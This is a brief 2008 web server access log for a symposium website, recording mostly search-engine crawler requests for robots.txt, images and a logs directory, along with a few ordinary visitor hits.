66.249.65.200 - - [21/Sep/2008:14:14:08 -0400] "GET /images/candle1.jpg HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
91.205.124.13 - - [21/Sep/2008:14:41:40 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" 0 www.geil-symposium.com
76.69.198.70 - - [21/Sep/2008:14:41:46 -0400] "GET /publications.html HTTP/1.1" 404 - "http://www.google.ca/search?hl=fr&rlz=1T4ADBS_enCA245CA245&q=trimethylene+terephthalate&start=160&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
74.6.22.174 - - [21/Sep/2008:17:20:10 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.174 - - [21/Sep/2008:17:20:11 -0400] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.174 - - [21/Sep/2008:17:20:11 -0400] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
217.93.232.72 - - [21/Sep/2008:19:40:12 -0400] "GET http://www.geil-symposium.com/ HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" 0 www.geil-symposium.com
66.249.65.200 - - [21/Sep/2008:19:45:56 -0400] "GET /images/logo_dupont.gif HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
64.246.161.190 - - [21/Sep/2008:22:07:30 -0400] "GET /robots.txt HTTP/1.0" 404 - "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
